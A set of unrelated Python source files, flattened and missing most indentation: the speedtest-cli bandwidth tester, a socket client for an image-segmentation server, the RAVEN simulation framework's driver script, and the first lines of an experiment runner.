speedtest_cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2015 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import sys
import math
import signal
import socket
import timeit
import platform
import threading
__version__ = '0.3.4'
# Some global variables we use
user_agent = None
source = None
shutdown_event = None
scheme = 'http'
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
e_http_py2 = sys.exc_info()
try:
from http.client import HTTPConnection, HTTPSConnection
except ImportError:
e_http_py3 = sys.exc_info()
raise SystemExit('Your python installation is missing required HTTP '
'client classes:\n\n'
'Python 2: %s\n'
'Python 3: %s' % (e_http_py2[1], e_http_py3[1]))
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
class SpeedtestCliServerListError(Exception):
"""Internal Exception class used to indicate to move on to the next
URL for retrieving speedtest.net server details
"""
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) +
math.cos(math.radians(lat1)) *
math.cos(math.radians(lat2)) * math.sin(dlon / 2) *
math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
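# Hedged illustration (not part of the upstream script): a small unused helper
# showing how distance() can be exercised. The coordinates below are example
# values for London and Paris, chosen only for this sketch.
def _example_distance():
    # Great-circle distance London -> Paris, roughly 344 km.
    return round(distance([51.5074, -0.1278], [48.8566, 2.3522]))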
def build_user_agent():
"""Build a Mozilla/5.0 compatible User-Agent string"""
global user_agent
if user_agent:
return user_agent
ua_tuple = (
'Mozilla/5.0',
'(%s; U; %s; en-us)' % (platform.system(), platform.architecture()[0]),
'Python/%s' % platform.python_version(),
'(KHTML, like Gecko)',
'speedtest-cli/%s' % __version__
)
user_agent = ' '.join(ua_tuple)
return user_agent
def build_request(url, data=None, headers={}):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
if url[0] == ':':
schemed_url = '%s%s' % (scheme, url)
else:
schemed_url = url
headers['User-Agent'] = user_agent
return Request(schemed_url, data=data, headers=headers)
def catch_request(request):
"""Helper function to catch common exceptions encountered when
establishing a connection with a HTTP/HTTPS request
"""
try:
uh = urlopen(request)
return uh, False
except (HTTPError, URLError, socket.error):
e = sys.exc_info()[1]
return None, e
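# Hedged sketch: catch_request() returns a (handle, error) pair instead of
# raising, so callers branch on the second element. The scheme-less URL below
# follows the '://host/path' convention that build_request() completes with the
# module-level `scheme`; it is the same config URL getConfig() uses.
def _example_catch_request():
    build_user_agent()  # pre-cache the User-Agent, as speedtest() does
    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)
    if e:
        return None
    try:
        return uh.read()
    finally:
        uh.close()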
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
request = build_request(self.url)
f = urlopen(request)
                while not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
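# Hedged usage sketch: downloadSpeed() takes a flat list of image URLs and relies
# on the module-level shutdown_event being a threading.Event (speedtest() below
# normally creates it). The host below is a placeholder, not a real test server.
def _example_download_speed():
    global shutdown_event
    if shutdown_event is None:
        shutdown_event = threading.Event()
    build_user_agent()  # pre-cache the User-Agent used by build_request()
    urls = ['http://example.invalid/speedtest/random350x350.jpg'] * 4
    return downloadSpeed(urls, quiet=True)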
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
request = build_request(self.url, data=self.data)
f = urlopen(request)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
request = build_request('://www.speedtest.net/speedtest-config.php')
uh, e = catch_request(request)
if e:
print_('Could not retrieve speedtest.net configuration: %s' % e)
sys.exit(1)
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
        except AttributeError:  # ET unavailable; fall back to xml.dom.minidom
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
urls = [
'://www.speedtest.net/speedtest-servers-static.php',
'://c.speedtest.net/speedtest-servers-static.php',
'://www.speedtest.net/speedtest-servers.php',
'://c.speedtest.net/speedtest-servers.php',
]
errors = []
servers = {}
for url in urls:
try:
request = build_request(url)
uh, e = catch_request(request)
if e:
errors.append('%s' % e)
raise SpeedtestCliServerListError
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
uh.close()
raise SpeedtestCliServerListError
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
                except AttributeError:  # ET unavailable; fall back to xml.dom.minidom
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
raise SpeedtestCliServerListError
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']),
float(client['lon'])],
[float(attrib.get('lat')),
float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
except SpeedtestCliServerListError:
continue
# We were able to fetch and parse the list of speedtest.net servers
if servers:
break
if not servers:
print_('Failed to retrieve list of speedtest.net servers:\n\n %s' %
'\n'.join(errors))
sys.exit(1)
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
headers = {'User-Agent': user_agent}
start = timeit.default_timer()
h.request("GET", urlparts[2], headers=headers)
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
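# Hedged sketch: getBestServer() expects server dicts shaped like those returned
# by closestServers() (at minimum a 'url' key); it probes latency.txt three times
# per server and returns the entry with the lowest average, adding a 'latency'
# key in milliseconds. The placeholder host below is illustrative only.
def _example_get_best_server():
    build_user_agent()
    fake_servers = [{'url': 'http://example.invalid/speedtest/upload.php', 'id': '0'}]
    return getBestServer(fake_servers)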
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source, scheme
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
_result = {}
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('byte', 1), default=('bit', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
help='HTTP timeout in seconds. Default 10')
parser.add_argument('--secure', action='store_true',
help='Use HTTPS instead of HTTP when communicating '
'with speedtest.net operated servers')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
socket.setdefaulttimeout(args.timeout)
# Pre-cache the user agent string
build_user_agent()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if args.secure:
scheme = 'https'
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
request = build_request(args.mini)
f = urlopen(request)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
request = build_request('%s/speedtest/upload.%s' %
(args.mini, ext))
f = urlopen(request)
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
_result['latency'] = '%(latency)s' % best
if not args.simple:
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
    _result['download'] = '%0.2f' % ((dlspeed / 1000 / 1000) * 8)
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
    _result['upload'] = '%0.2f' % ((ulspeed / 1000 / 1000) * 8)
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
request = build_request('://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode(),
headers=headers)
f, e = catch_request(request)
if e:
print_('Could not submit results to speedtest.net: %s' % e)
sys.exit(1)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: %s://www.speedtest.net/result/%s.png' %
(scheme, resultid[0]))
return _result
return _result
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
segmentation.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#########################################################
# Copyright (C) 2022, Chen Jianqu, Shanghai University
#
# This file is part of is_slam.
#
# Licensed under the MIT License;
# you may not use this file except in compliance with the License.
#########################################################
from threading import Thread,Lock
import socket
import cv2
import numpy
import time
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recvimage(conn):
length = recvall(conn,16)
stringData = recvall(conn, int(length))
data = numpy.fromstring(stringData, dtype='uint8')
decimg=cv2.imdecode(data,1)
return decimg
def sendimage(conn,img):
    result, imgencode = cv2.imencode('.png', img, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])  # lossless PNG encoding to avoid distortion
data = numpy.array(imgencode)
stringData = data.tostring()
    conn.sendall(str(len(stringData)).ljust(16))
    conn.sendall(stringData)
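# Hedged usage sketch: one client round trip over the 16-byte length-prefixed
# protocol implemented by sendimage()/recvimage() above. ('localhost', 12345)
# mirrors the address used by Segmentation.run() below; the blank test image is
# illustrative only.
def _example_round_trip():
    img = numpy.zeros((4, 4, 3), dtype='uint8')
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('localhost', 12345))
    try:
        sendimage(sock, img)
        return recvimage(sock)
    finally:
        sock.close()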
class Segmentation:
def __init__(self):
self.msg_list=[]
self.result_list=[]
self.msg_list_lock=Lock()
self.result_list_lock=Lock()
self.is_run=True
self.is_run_lock=Lock()
        # start the processing thread
t = Thread(target=Segmentation.run, args=(self,))
        t.setDaemon(True)  # daemon thread: killed automatically when the main thread exits, even if its work is unfinished
t.start()
        # t.join()  # thread synchronization: the main thread would block here until the worker thread finishes
def run(self):
address = ('localhost', 12345)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(address)
counter=0
while self.get_state():
if(self.get_waiting_len()>0):
img,img_header,depth_msg=self.pop_msg()
                sendimage(sock, img)  # send the image to the segmentation server
                result = recvimage(sock)  # receive the segmentation result
#cv2.imwrite("/media/chen/chen/Robot/Data/InstanceSegmentation/test/"+str(counter)+".png",
# result,[int(cv2.IMWRITE_PNG_COMPRESSION),0])
counter+=1
                self.push_result((result, img_header, depth_msg))  # push onto the result queue
sock.close()
def get_state(self):
state=True
self.is_run_lock.acquire()
state=self.is_run
self.is_run_lock.release()
return state
def set_state(self,state):
self.is_run_lock.acquire()
self.is_run=state
self.is_run_lock.release()
def push_msg(self,msg):
self.msg_list_lock.acquire()
self.msg_list.append(msg)
self.msg_list_lock.release()
def pop_msg(self):
msg=0
self.msg_list_lock.acquire()
msg=self.msg_list.pop(0)
self.msg_list_lock.release()
return msg
def get_waiting_len(self):
length=0
self.msg_list_lock.acquire()
length=len(self.msg_list)
self.msg_list_lock.release()
return length
def push_result(self,msg):
self.result_list_lock.acquire()
self.result_list.append(msg)
self.result_list_lock.release()
def pop_result(self):
msg=0
self.result_list_lock.acquire()
msg=self.result_list.pop(0)
self.result_list_lock.release()
return msg
def get_result_len(self):
length=0
self.result_list_lock.acquire()
length=len(self.result_list)
self.result_list_lock.release()
return length
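# Hedged usage sketch of the Segmentation queue API above: push one message
# (image, header, depth) and poll until the worker thread posts a result. The
# argument names only mirror what run() unpacks; they are not defined here.
def _example_segmentation_usage(img, img_header, depth_msg):
    seg = Segmentation()
    seg.push_msg((img, img_header, depth_msg))
    while seg.get_result_len() == 0:
        time.sleep(0.01)
    result, header, depth = seg.pop_result()
    seg.set_state(False)  # ask the worker loop to stop
    return result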
|
Driver.py
|
#!/usr/bin/env python
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Feb 20, 2013
@author: crisr
This is the Driver of RAVEN
"""
#For future compatibility with Python 3
from __future__ import division, print_function, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3
#External Modules--------------------begin
import xml.etree.ElementTree as ET
import os
import sys
import threading
import time
import traceback
#External Modules--------------------end
#warning: this needs to be before importing h5py
os.environ["MV2_ENABLE_AFFINITY"]="0"
frameworkDir = os.path.dirname(os.path.abspath(__file__))
from utils import utils
import utils.TreeStructure as TS
utils.find_crow(frameworkDir)
if sys.version_info.major == 2:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp'))
else:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp3'))
utils.add_path(os.path.join(frameworkDir,'contrib','AMSC'))
utils.add_path(os.path.join(frameworkDir,'contrib'))
#Internal Modules
from Simulation import Simulation
from Application import __QtAvailable
from Interaction import Interaction
#Internal Modules
#------------------------------------------------------------- Driver
def printStatement():
"""
Method to print the BEA header
@ In, None
@ Out, None
"""
print("""
Copyright 2017 Battelle Energy Alliance, LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
""")
def printLogo():
"""
Method to print a RAVEN logo
@ In, None
@ Out, None
"""
print("""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.---. .------###### ##### ### ### ######## ### ###
/ \ __ / --### ### ### ### ### ### ### ##### ###
/ / \( )/ --### ### ### ### ### ### ###### ### ######
////// ' \/ ` --####### ######### ### ### ### ### #####
//// / // : : -### ### ### ### ###### #### ### ####
// / / /` '---### ### ### ### ### ######## ### ###
// //..\\
===========UU====UU=============================================================
'//||\\`
''``
""")
def checkVersions():
"""
Method to check if versions of modules are new enough. Will call sys.exit
if they are not in the range specified.
@ In, None
@ Out, None
"""
sys.path.append(os.path.join(os.path.dirname(frameworkDir),"scripts","TestHarness","testers"))
import RavenUtils
sys.path.pop() #remove testers path
missing,outOfRange,notQA = RavenUtils.checkForMissingModules(False)
if len(missing) + len(outOfRange) > 0 and RavenUtils.checkVersions():
print("ERROR: too old, too new, or missing raven libraries, not running:")
for error in missing + outOfRange + notQA:
print(error)
sys.exit(-4)
else:
if len(missing) + len(outOfRange) > 0:
print("WARNING: not using tested versions of the libraries:")
for warning in notQA + missing + outOfRange:
print(warning)
if __name__ == '__main__':
"""This is the main driver for the RAVEN framework"""
# Retrieve the framework directory path and working dir
printLogo()
printStatement()
checkVersions()
verbosity = 'all'
interfaceCheck = False
interactive = Interaction.No
workingDir = os.getcwd()
## Remove duplicate command line options and preserve order so if they try
## conflicting options, the last one will take precedence.
sys.argv = utils.removeDuplicates(sys.argv)
itemsToRemove = []
for item in sys.argv:
# I don't think these do anything. - talbpaul, 2017-10
if item.lower() in ['silent','quiet','all']:
verbosity = item.lower()
itemsToRemove.append(item)
elif item.lower() == 'interfacecheck':
interfaceCheck = True
itemsToRemove.append(item)
elif item.lower() == 'interactive':
if __QtAvailable:
interactive = Interaction.Yes
else:
print('Qt is not available, disabling interactive mode.\n')
itemsToRemove.append(item)
elif item.lower() == 'interactivecheck':
if __QtAvailable:
interactive = Interaction.Test
else:
print('Qt is not available, disabling interactive check.\n')
itemsToRemove.append(item)
## Now outside of the loop iterating on the object we want to modify, we are
## safe to remove each of the items
for item in itemsToRemove:
sys.argv.remove(item)
if interfaceCheck:
os.environ['RAVENinterfaceCheck'] = 'True'
else:
os.environ['RAVENinterfaceCheck'] = 'False'
simulation = Simulation(frameworkDir, verbosity=verbosity, interactive=interactive)
#If a configuration file exists, read it in
configFile = os.path.join(os.path.expanduser("~"),".raven","default_runinfo.xml")
if os.path.exists(configFile):
tree = ET.parse(configFile)
root = tree.getroot()
if root.tag == 'Simulation' and [x.tag for x in root] == ["RunInfo"]:
simulation.XMLread(root,runInfoSkip=set(["totNumCoresUsed"]),xmlFilename=configFile)
else:
    e=IOError('DRIVER',str(configFile)+' should contain only a Simulation block with a RunInfo block inside it')
print('\nERROR! In Driver,',e,'\n')
sys.exit(1)
# Find the XML input file
if len(sys.argv) == 1:
  #NOTE: This can be overridden at the command line:
# python Driver.py anotherFile.xml
# or in the configuration file by DefaultInputFile
inputFiles = [simulation.getDefaultInputFile()]
else:
inputFiles = sys.argv[1:]
for i in range(len(inputFiles)):
if not os.path.isabs(inputFiles[i]):
inputFiles[i] = os.path.join(workingDir,inputFiles[i])
simulation.setInputFiles(inputFiles)
#Parse the input
#For future developers of this block, assure that useful, informative exceptions
# are still thrown while parsing the XML tree. Otherwise any error made by
# the developer or user might be obfuscated.
for inputFile in inputFiles:
try:
tree = TS.parse(open(inputFile,'r'))
except TS.InputParsingError as e:
print('\nInput Parsing error!',e,'\n')
sys.exit(1)
  #except? raise an IOError('not possible to parse (xml based) the input file '+inputFile)
if verbosity=='debug':
print('DRIVER','opened file '+inputFile)
root = tree.getroot()
if root.tag != 'Simulation':
    e=IOError('The outermost block of the input file '+inputFile+' is not Simulation')
print('\nInput XML Error!',e,'\n')
sys.exit(1)
# call the function to load the external xml files into the input tree
cwd = os.path.dirname(os.path.abspath(inputFile))
simulation.XMLpreprocess(root,cwd)
#generate all the components of the simulation
#Call the function to read and construct each single module of the simulation
simulation.XMLread(root,runInfoSkip=set(["DefaultInputFile"]),xmlFilename=inputFile)
def raven():
"""
A worker function that allows the computation of the main RAVEN execution
to be offloaded to another thread, freeing the main thread for UI
interaction (Qt requires UI to be handled on the main thread of execution)
"""
simulation.initialize()
simulation.run()
## If there is an associated UI application, then we can quit it now that
## we are done, the main thread does not know when this done presumably
## because this thread still is technically running as long as the app,
## which both threads can see, has not called quit. Otherwise, we could do
## this after the while loop below.
if simulation.app is not None:
simulation.app.quit()
if simulation.app is not None:
try:
## Create the thread that will run RAVEN, and make sure that it will die if
## the main thread dies by making it a daemon, then start it up
ravenThread = threading.Thread(target=raven)
ravenThread.daemon = True
ravenThread.start()
## If there is an associated application, then we can start it up now as
## well. It will listen for UI update requests from the ravenThread.
if simulation.app is not None:
simulation.app.exec_()
## This makes sure that the main thread waits for RAVEN to complete before
## exiting, however join will block the main thread until ravenThread is
## complete, thus ignoring any kill signals until after it has completed
# ravenThread.join()
waitTime = 0.1 ## in seconds
## So, in order to live wait for ravenThread, we need a spinlock that will
## allow us to accept keyboard input.
while ravenThread.isAlive():
## Use one of these two alternatives, effectively they should be the same
## not sure if there is any advantage to one over the other
time.sleep(waitTime)
# ravenThread.join(waitTime)
except KeyboardInterrupt:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Received keyboard interrupt, exiting RAVEN.\n\n')
except SystemExit:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Exit called, exiting RAVEN.\n\n')
else:
raven()
|
run_necleus_decomposition.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=necleus_decomp_exec_path_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
